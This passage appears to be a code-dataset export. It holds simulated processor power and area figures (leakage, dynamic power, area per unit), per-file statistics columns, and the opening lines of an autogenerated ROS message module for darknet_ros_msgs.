'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0300875,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0202701,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0555819,
'Execution Unit/Register Files/Runtime Dynamic': 0.0230109,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0700187,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.184639,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.06049,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000189419,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000189419,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000165268,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 6.41336e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000291182,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.000835288,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00180597,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0194862,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.23949,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0535352,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0661838,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 3.51816,
'Instruction Fetch Unit/Runtime Dynamic': 0.141846,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0430708,
'L2/Runtime Dynamic': 0.0119442,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.01377,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.39345,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0251266,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0251265,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.13243,
'Load Store Unit/Runtime Dynamic': 0.542492,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.061958,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.123916,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0219891,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0226268,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.077067,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.00880337,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.270949,
'Memory Management Unit/Runtime Dynamic': 0.0314302,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 13.7251,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0670636,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0037643,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0323038,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.103132,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 1.89134,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0267206,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.223676,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.135946,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.065922,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.10633,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0536717,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.225923,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.054553,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.17378,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0256832,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00276506,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0303382,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0204493,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0560214,
'Execution Unit/Register Files/Runtime Dynamic': 0.0232144,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0705957,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.186858,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.06505,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000185308,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000185308,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000161703,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 6.27614e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000293756,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.000826076,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00176602,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0196585,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.25045,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0538894,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.066769,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 3.52965,
'Instruction Fetch Unit/Runtime Dynamic': 0.142909,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0448622,
'L2/Runtime Dynamic': 0.0125198,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.03051,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.40245,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0256681,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0256682,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.15172,
'Load Store Unit/Runtime Dynamic': 0.554705,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0632932,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.126587,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.022463,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0231278,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.0777482,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.00886089,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.272444,
'Memory Management Unit/Runtime Dynamic': 0.0319887,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 13.7619,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0675603,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00379641,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0326076,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.103964,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 1.91114,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 8.437790202507701,
'Runtime Dynamic': 8.437790202507701,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.377528,
'Runtime Dynamic': 0.14026,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 61.4145,
'Peak Power': 94.5267,
'Runtime Dynamic': 9.9394,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 61.037,
'Total Cores/Runtime Dynamic': 9.79914,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.377528,
'Total L3s/Runtime Dynamic': 0.14026,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
| 75.12035
| 124
| 0.682275
| 8,085
| 68,660
| 5.788126
| 0.067532
| 0.123427
| 0.112828
| 0.093339
| 0.938757
| 0.930273
| 0.917901
| 0.88745
| 0.862448
| 0.841742
| 0
| 0.132666
| 0.224163
| 68,660
| 914
| 125
| 75.12035
| 0.745837
| 0
| 0
| 0.642232
| 0
| 0
| 0.656923
| 0.048062
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c3d88ae30b5927313a3fbd970dd4a5f973d6b45f
| 37,327
|
py
|
Python
|
ros/devel/lib/python2.7/dist-packages/darknet_ros_msgs/msg/_CheckForObjectsAction.py
|
wutianze/ComP
|
021440aa98aa03ee3b86ed3db196b95477b9f80b
|
[
"MIT"
] | 3
|
2021-08-20T03:25:37.000Z
|
2022-03-31T02:47:28.000Z
|
ros/devel/lib/python2.7/dist-packages/darknet_ros_msgs/msg/_CheckForObjectsAction.py
|
wutianze/ComP
|
021440aa98aa03ee3b86ed3db196b95477b9f80b
|
[
"MIT"
] | null | null | null |
ros/devel/lib/python2.7/dist-packages/darknet_ros_msgs/msg/_CheckForObjectsAction.py
|
wutianze/ComP
|
021440aa98aa03ee3b86ed3db196b95477b9f80b
|
[
"MIT"
] | null | null | null |
# This Python file uses the following encoding: utf-8
"""autogenerated by genpy from darknet_ros_msgs/CheckForObjectsAction.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import darknet_ros_msgs.msg
import sensor_msgs.msg
import genpy
import actionlib_msgs.msg
import std_msgs.msg
class CheckForObjectsAction(genpy.Message):
